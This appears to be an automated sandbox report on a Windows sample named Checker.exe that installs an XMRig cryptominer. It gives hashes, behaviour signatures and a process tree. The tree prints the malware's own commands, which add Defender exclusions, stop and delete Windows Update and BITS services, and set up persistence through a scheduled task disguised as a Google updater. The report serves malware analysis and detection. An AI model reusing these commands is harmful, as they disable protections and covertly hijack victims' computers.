Analysis
max time kernel: 152s
max time network: 155s
platform: windows10-2004_x64
resource: win10v2004-20230703-en
resource tags: arch:x64 arch:x86 image:win10v2004-20230703-en locale:en-us os:windows10-2004-x64 system
submitted: 06/07/2023, 10:44
Behavioral tasks
behavioral1: Checker.exe (win7-20230705-en)
behavioral2: Checker.exe (win10v2004-20230703-en)
behavioral3: LiveCharts.xml (win7-20230703-en)
behavioral4: LiveCharts.xml (win10v2004-20230703-en)
behavioral5: LiveChartsCountries.dll (win7-20230703-en)
behavioral6: LiveChartsCountries.dll (win10v2004-20230703-en)
behavioral7: LiveChartsRegion.dll (win7-20230705-en)
behavioral8: LiveChartsRegion.dll (win10v2004-20230703-en)
behavioral9: MetroSet UI.dll (win7-20230703-en)
behavioral10: MetroSet UI.dll (win10v2004-20230703-en)
behavioral11: NAudio.dll (win7-20230703-en)
behavioral12: NAudio.dll (win10v2004-20230703-en)
behavioral13: System.IO.Compression.ZipFile.dll (win7-20230703-en)
behavioral14: System.IO.Compression.ZipFile.dll (win10v2004-20230703-en)
behavioral15: System.IO.Compression.dll (win7-20230703-en)
behavioral16: System.IO.Compression.dll (win10v2004-20230703-en)
behavioral17: Vip.Notification.dll (win7-20230703-en)
behavioral18: Vip.Notification.dll (win10v2004-20230703-en)
behavioral19: WinMM.Net.dll (win7-20230703-en)
behavioral20: WinMM.Net.dll (win10v2004-20230703-en)
behavioral21: World.xml (win7-20230703-en)
behavioral22: World.xml (win10v2004-20230703-en)
behavioral23: postproc-54.dll (win7-20230703-en)
behavioral24: postproc-54.dll (win10v2004-20230703-en)
behavioral25: swresample-2.dll (win7-20230703-en)
behavioral26: swresample-2.dll (win10v2004-20230703-en)
behavioral27: swscale-4.dll (win7-20230703-en)
behavioral28: swscale-4.dll (win10v2004-20230703-en)
General
Target: Checker.exe
Size: 53.0MB
MD5: 57afcb97e60f92e2fe43d869d5a432d5
SHA1: b29668c32b353efdcab5aa367f761e1f1682ea91
SHA256: 7c640fe9a4d562fbec6fd8b51daca0a133465845fc4a8de35e2f6af95a8e9611
SHA512: 70e444062d1bf30ea500e55353d790e7c0a9d0985b4e90f2f008881f44cd68a50e64b46280c38fae8c482fcf2c21d98c3595752bec6e0805032dab07e672407f
SSDEEP: 786432:PqwfGQxHq+2QrViNeZO4pc+rN15CDL+jAvgRdsFSFo0NV:guVt44p1nsn+jAvgRdsMFoS
Malware Config
Signatures

Modifies security service (2 TTPs, 5 IoCs)
- Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security (reg.exe)
- Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 (reg.exe)
- Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 (reg.exe)
- Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo (reg.exe)
- Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters (reg.exe)
Suspicious use of NtCreateUserProcessOtherParentProcess (11 IoCs)
XMRig Miner payload (10 IoCs)
Stops running service(s) (3 TTPs)
Executes dropped EXE (1 IoC)
- PID 3484 updater.exe
Drops file in System32 directory (3 IoCs)
- File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (powershell.exe)
- File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log (powershell.exe)
- File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (powershell.exe)
Suspicious use of SetThreadContext (2 IoCs)
- PID 3484 (updater.exe) set thread context of 768 (target procid 121)
- PID 3484 (updater.exe) set thread context of 4240 (target procid 127)
Drops file in Program Files directory (4 IoCs)
- File created C:\Program Files\Google\Libs\g.log (cmd.exe)
- File created C:\Program Files\Google\Libs\g.log (cmd.exe)
- File created C:\Program Files\Google\Chrome\updater.exe (Checker.exe)
- File created C:\Program Files\Google\Libs\WR64.sys (updater.exe)
Launches sc.exe (10 IoCs)
sc.exe is a Windows utility to control services on the system.
- sc.exe PIDs: 4224, 3016, 5004, 2820, 2348, 1500, 3804, 2156, 2504, 4152
Detects videocard installed (1 TTP, 1 IoC)
Uses WMIC.exe to determine videocard installed.
- PID 4644 WMIC.exe
Modifies data under HKEY_USERS (64 IoCs)
Suspicious behavior: EnumeratesProcesses (64 IoCs)
Suspicious behavior: LoadsDriver (1 IoC)
- PID 660 Process not Found
Suspicious use of AdjustPrivilegeToken (64 IoCs)
Suspicious use of WriteProcessMemory (46 IoCs)
Uses Task Scheduler COM API (1 TTP)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes

C:\Windows\Explorer.EXE  (PID 2864)
  cmdline: C:\Windows\Explorer.EXE

  C:\Users\Admin\AppData\Local\Temp\Checker.exe  (PID 4040)
    cmdline: "C:\Users\Admin\AppData\Local\Temp\Checker.exe"
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 4280)
    cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\System32\cmd.exe  (PID 1840)
    cmdline: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    - Suspicious use of WriteProcessMemory

    C:\Windows\System32\sc.exe  (PID 2504)
      cmdline: sc stop UsoSvc
      - Launches sc.exe

    C:\Windows\System32\sc.exe  (PID 4152)
      cmdline: sc stop WaaSMedicSvc
      - Launches sc.exe

    C:\Windows\System32\sc.exe  (PID 1500)
      cmdline: sc stop wuauserv
      - Launches sc.exe

    C:\Windows\System32\sc.exe  (PID 3804)
      cmdline: sc stop bits
      - Launches sc.exe

    C:\Windows\System32\sc.exe  (PID 2820)
      cmdline: sc stop dosvc
      - Launches sc.exe

    C:\Windows\System32\reg.exe  (PID 756)
      cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f

    C:\Windows\System32\reg.exe  (PID 4440)
      cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f

    C:\Windows\System32\reg.exe  (PID 4204)
      cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
      - Modifies security service

    C:\Windows\System32\reg.exe  (PID 1128)
      cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f

    C:\Windows\System32\reg.exe  (PID 5016)
      cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 3704)
    cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#rosbrqmf#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 3800)
    cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#jcwit#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\schtasks.exe  (PID 3632)
      cmdline: "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 1412)
    cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses

  C:\Windows\System32\cmd.exe  (PID 5096)
    cmdline: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    - Suspicious use of WriteProcessMemory

    C:\Windows\System32\sc.exe  (PID 2348)
      cmdline: sc stop UsoSvc
      - Launches sc.exe

    C:\Windows\System32\sc.exe  (PID 4224)
      cmdline: sc stop WaaSMedicSvc
      - Launches sc.exe

    C:\Windows\System32\sc.exe  (PID 2156)
      cmdline: sc stop wuauserv
      - Launches sc.exe

    C:\Windows\System32\sc.exe  (PID 3016)
      cmdline: sc stop bits
      - Launches sc.exe

    C:\Windows\System32\sc.exe  (PID 5004)
      cmdline: sc stop dosvc
      - Launches sc.exe

    C:\Windows\System32\reg.exe  (PID 4052)
      cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f

    C:\Windows\System32\reg.exe  (PID 2916)
      cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f

    C:\Windows\System32\reg.exe  (PID 2964)
      cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f

    C:\Windows\System32\reg.exe  (PID 3840)
      cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f

    C:\Windows\System32\reg.exe  (PID 1536)
      cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 3100)
    cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#rosbrqmf#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses

  C:\Windows\System32\conhost.exe  (PID 768)
    cmdline: C:\Windows\System32\conhost.exe rkostbomswpysz
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Suspicious behavior: EnumeratesProcesses

  C:\Windows\System32\cmd.exe  (PID 5104)
    cmdline: C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
    - Drops file in Program Files directory
    - Suspicious use of WriteProcessMemory

    C:\Windows\System32\Wbem\WMIC.exe  (PID 4644)
      cmdline: wmic PATH Win32_VideoController GET Name, VideoProcessor
      - Detects videocard installed

  C:\Windows\System32\cmd.exe  (PID 3720)
    cmdline: C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
    - Drops file in Program Files directory

  C:\Windows\System32\conhost.exe  (PID 4240)
    cmdline: C:\Windows\System32\conhost.exe lpvrtgaoraybnvjp 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPpZDYkQjcS/S/TS19hCmaZeMR2zIsa2YhX3HvrJ76L3PYAw7qlLpJBbIeCTNKBaLPSykUvzekO7koObVh69XukHNmYf5W8bMDaMPHDBhALjxm6ziWFUO9JHrnjNDYz4TjXjDaYA24sYnWlUXH83ZDmapbvZr3aqfKfyG9nx4moeRNlWj2lCejFqkaCPIieIWBnpkI3QbS0BzxviXA/4GRSKOWNHKn1bm7X3fdig6VZbCjqyzHehh8LEsH5QnzNW7X1zr4wsp4wmti6JKB2Z96l0RN9iP9PutKKsk+KJv1YK7cQAIwLotcd2/KqbIHXAW6N6liCNwugSW24ESXQmTzPxdnoYjZr2hpHGhqvVe54HraR7se9rJ/j7PQ+9BChih6hZJgcUrwa1KkW1gkRPN5dNRlmr7HMPGYgY695nz/U05zjCKr1NrGSmx9TSWA5uF+g=
    - Suspicious behavior: EnumeratesProcesses

C:\Program Files\Google\Chrome\updater.exe  (PID 3484)
  cmdline: "C:\Program Files\Google\Chrome\updater.exe"
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory